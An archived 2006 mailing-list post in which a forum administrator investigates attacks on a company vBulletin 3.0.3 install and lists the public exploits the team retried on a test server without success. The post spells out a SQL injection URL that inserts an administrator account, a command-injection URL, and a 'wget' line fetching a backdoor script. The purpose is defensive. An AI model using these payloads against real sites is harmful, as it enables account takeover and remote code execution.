From: Dave (fla.tech.talk@gmail.com)
Date: Sun Jun 25 2006 - 22:41:51 EDT
pen testers,
Our companies website hosts a forum program called vBulletin 3.0.3. A
few recent incidents (i.e. threads vanishing, user accounts deleted) has
us looking into how this is happening. Our manager wants to solve this
problem 'in house' so the task was given to me and another employee to
see if we can figure out how this is happening and stop it.
1) We have closely monitored all (co)admin and moderators activities and
this has revealed nothing out of the ordinary.
2) We restored the DB content using a backup and within 2 days the
threads and accounts in question were gone again.
3) We downloaded and installed a patch from vbulletin.com that was
supposed to secure the application but this has not stopped the problem.
We assumed the attacker was using some sort of SQL injection to alter
the DB records or possibly he can craft a SQL query in a way that will
create an admin account to use to simply log in and alter the records
and then delete his username...NO rogue admin accounts have ever been
found.
1) We searched the bugtraq lists at securityfocus.com and packetstorm
for known SQL vulns for vBulletin
2) We set up a test server to test our theories without damaging the
actual DB or interrupting normal business. The options granted to our
vbulletin DB user are SELECT,UPDATE,ALTER,INSERT and DELETE so we set up
our test DB with the same permissions etc...
In our search for possible vulns we came across these links:
http://packetstormsecurity.nl/0509-exploits/20050917-vbulletin-3.0.8.txt
When we try to test these POC snippets we dont get results. Examples we
have tried:
USING example :
admincp/user.php?do=find&orderby=username&limitnumber=[SQL] we crafted
a URL:
http://192.168.6.99:8080/vb-forums/admincp/user.php?do=find&orderby=username&limitnumber=[INSERT%20INTO%20user%20VALUES('12345',%20'6',%20'',%20'0',%20'admintest',%20'5f376e00eb11f00d0262636a5b699501',%20'2006-06-25',%20'nospam@nospam.org',%20'0',%20'',%20'',%20'',%20'',%20'',%20'2',%20'Administrator',%20'0',%20'1151266933',%20'0',%20'1151272079',%20'1151274578',%20'1151267867',%20'1',%20'10',%20'1',%20'',%20'0',%20'0',%20'0',%20'2135',%20'',%20'0000-00-00',%20'-1',%20'1',%20'',%20'0',%20'0',%20'',%20'0',%20'0',%20'-1',%20'0',%20'0',%20'$Nu')]
The syntax for this SQL was obtained from the backup.sql file created by
vBulletin. In theory this would create an account with following values:
userid = 12345
usergroupid = 6
username = admintest
password = 5f376e00eb11f00d0262636a5b699501 this = "password"
passworddate = 2006-06-25
email = nospam@nospam.org
styleid = 0
usertitle = Administrator
reputation = 10
reputationlevelid = 1
options = 2135
salt = $Nu
Another example we tried:
URL of vuln listing:
http://packetstormsecurity.nl/0502-exploits/vbulletin-3.0.4-2.txt
Reading this we wondered if the attacker was possibly running a command
on the server (such as wget http://foobar.com/backdoor.script) then
using this backdoor script he is able to view source code of DB related
scripts to obtain info for DB access etc...
We have tried using both the POC code and self crafted URL's like:
http://192.168.6.99:8080/vb-forums/forumdisplay.php?GLOBALS[]=1&f=1&comma=".`echo
_START_`.`'touch test.txt'`.`echo _END_`."
> then
http://192.168.6.99:8080/vb-forums/test.txt
> 404 error file not found
This is just a small list of unfruitful examples gathered during a
rather exhaustive effort to exploit this application. To date we were
not able to successfully exploit the vBulletin application using any of
the available POC code snippets. We were hoping that someone out there
who is more proficient at this line of work could shed some light on our
situation and possibly point us in the right direction.
Thanks in advance for any suggestions.
Dave
------------------------------------------------------------------------------
This List Sponsored by: Cenzic
Concerned about Web Application Security?
Why not go with the #1 solution - Cenzic, the only one to win the Analyst's
Choice Award from eWeek. As attacks through web applications continue to rise,
you need to proactively protect your applications from hackers. Cenzic has the
most comprehensive solutions to meet your application security penetration
testing and vulnerability management needs. You have an option to go with a
managed service (Cenzic ClickToSecure) or an enterprise software
(Cenzic Hailstorm). Download FREE whitepaper on how a managed service can
help you: http://www.cenzic.com/news_events/wpappsec.php
And, now for a limited time we can do a FREE audit for you to confirm your
results from other product. Contact us at request@cenzic.com for details.
------------------------------------------------------------------------------
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:56:10 EDT